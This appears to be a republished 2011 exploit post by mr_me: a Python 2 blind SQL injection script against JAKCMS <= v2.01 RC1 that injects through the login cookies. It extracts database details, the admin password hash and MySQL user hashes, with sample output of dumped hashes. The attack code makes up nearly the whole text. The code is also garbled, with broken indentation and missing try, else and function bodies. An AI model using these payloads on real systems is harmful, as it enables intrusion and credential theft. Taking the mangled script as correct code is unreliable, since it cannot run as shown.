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JAKCMS <= v2.01 RC1 Blind SQL Injection Exploit
来源:net-ninja.net 作者:mr_me 发布时间:2011-02-23  

# jakCMS <= v2.01 RC1 Blind SQL Injection Exploit
# Understanding:
# The parameters 'JAK_COOKIE_NAME' and 'JAK_COOKIE_PASS' are parsed via cookies to the application
# and are unchecked for malicious characters. The contents of these variables are directly inserted into an
# SQL statement, leading to SQL Injection vulnerabilities.
# Notes:
# 1. PoC written to only work with the latest version. However, vuln exists in all versions.
# 2. The admin password is encrypted as a sha256 with a unique HMAC. However the default value is set to ''.
# [mr_me@pluto jak]$ python jakcmsSQLInjectionExploit.py -p localhost:8080 -t -d /webapps/jak/
#  | ----------------------------------------- |
# | JAKcms Remote Blind SQL Injection Explo!t |
# | by mr_me - net-ninja.net ---------------- |
# (+) Testing proxy @ localhost:8080.. proxy is found to be working!
# (+) Using 'upload/admin' value for the true page
# (+) This will take time, go grab a coffee..
# (!) Getting database version: 5.1.41-3ubuntu12.9
# (!) Getting database user: root@localhost
# (!) Getting database name: jak
# (!) Getting JakCMS administrative account: admin:98b1d8e3f0ae03888a87bba62bdaf9adf02c78e9c98cfc8c3f46ed7b428dd64b
# (!) w00t! You have access to MySQL database!
# (+) Dumping hashs hold onto your knickers..
# (+) The username and hashed password is: root:*EE4E2773D7530819563F0DC6FCE27446A51C9413
# (+) PoC finished.

import sys
import urllib
import re
import urllib2
from optparse import OptionParser

usage = "./%prog [<options>] -t [target] -d [directory]"
usage += "\nExample: ./%prog -p localhost:8080 -t -d /webapps/jak/"

parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
                  help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
                  help="The Target server <server:port>")
parser.add_option("-d", type="string", action="store", dest="dirPath",
                  help="Directory path to the CMS")

(options, args) = parser.parse_args()

def banner():
 print "\n\t| ----------------------------------------- |"
 print "\t| JAKcms Remote Blind SQL Injection Explo!t |"
 print "\t| by mr_me - net-ninja.net ---------------- |\n"

if len(sys.argv) < 5:

# set the stage........
trueStr = "upload/admin"
page = "index.php"
basicInfo = {'version':'version()', 'user':'user()', 'name':'database()'}
lower_value = 0
upper_value = 126

# test before we hit our target
def testProxy():
 check = 1
 sys.stdout.write("(+) Testing proxy @ %s.. " % (options.proxy))
         req = urllib2.Request("http://www.google.com/")
  check = urllib2.urlopen(req)
         check = 0
     if check != 0:
         sys.stdout.write("proxy is found to be working!\n")
         print "proxy failed, exiting.."

# handles all requests to the target server
def getServerResponse(exploit, header=None, data=None):
  headers = {}
  headers['Cookie'] = header
  req = urllib2.Request(exploit, data, headers)
  if options.proxy:

  check = urllib2.urlopen(req).read()   
 except urllib.error.HTTPError, error:
  check = error.read()
 except urllib.error.URLError:
  print "(-) Target connection failed, check your address"
 return check

# modified version of rsauron's function
# thanks bro.
def getAsciiValue(URI, data):
 lower = lower_value
        upper = upper_value
 while lower < upper:
   mid = (lower + upper) / 2
   header = data + ">"+str(mid)+"--+;"
   result = getServerResponse(URI, header)
   match = re.findall(trueStr,result)
   if len(match) >= 1:
                                lower = mid + 1
                              upper = mid
  except (KeyboardInterrupt, SystemExit):

 if lower > lower_value and lower < upper_value:
                value = lower
              header = data + "="+str(lower) +"-- ;"
  result = getServerResponse(URI, header)
                match = re.findall(trueStr,result)
                if len(match) > 1:
                        value = lower
                        print "\n(-) READ xprog's blind sql tutorial!\n"
        return value

# Do our blind attacks
def doBlindSqli():
 data = "JAK_COOKIE_PASS=test; JAK_COOKIE_NAME=admin"
 request = ("http://"+options.target+options.dirPath + page)
 print "(+) Using '%s' value for the true page" % (trueStr)
        print "(+) This will take time, go grab a coffee.."
        for key in basicInfo:
         sys.stdout.write("\n(!) Getting database %s: " % (key))

                # it will never go through all 50 iterations. \0/ lazy.
                for i in range(1,50):
   getBasicInfo = (data+"\"))+and+ascii(substring(%s,%s,1))" % (basicInfo[key],str(i)))
             asciival = getAsciiValue(request, getBasicInfo)
                        if asciival >= 0:
                                sys.stdout.write("%s" % (chr(asciival)))

 # get JAKCMS admin account data
 sys.stdout.write("\n(!) Getting JakCMS administrative account: ")
 for i in range(1,100):
  getUserAndPass = (data+"\"))+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+"
    "user+limit+0,1),%s,1))" % str(i))

  asciival = getAsciiValue(request, getUserAndPass)
  if asciival != 0:
   sys.stdout.write("%s" % (chr(asciival)))

 # if we are lucky, get the mysql user/pass
 isMysqlUser = (data+"\"))+and+(select+1+from+mysql.user+limit+0,1)=1--+")
        result = getServerResponse(request, isMysqlUser)
        match = re.findall(trueStr,result)
        if len(match) >= 1:
                print "\n(!) w00t! You have access to MySQL database!"
                print "(+) Dumping hashs hold onto your knickers.."
                sys.stdout.write("(+) The username and hashed password is: ")
                for k in range(1,100):
                        getMysqlUserAndPass = (data+"\"))+and+ascii(substring((SELECT+concat(user,0x3a,password)+from+"
                        "mysql.user+limit+0,1),%s,1))" % str(k))
                        asciival = getAsciiValue(request, getMysqlUserAndPass)
                        if asciival != 0:
                                sys.stdout.write("%s" % (chr(asciival)))
  sys.stdout.write("\n(+) PoC finished.\n")
  print "\n(-) You do not have access to MySQL database"

def main():
 if options.proxy:

if __name__ == "__main__":

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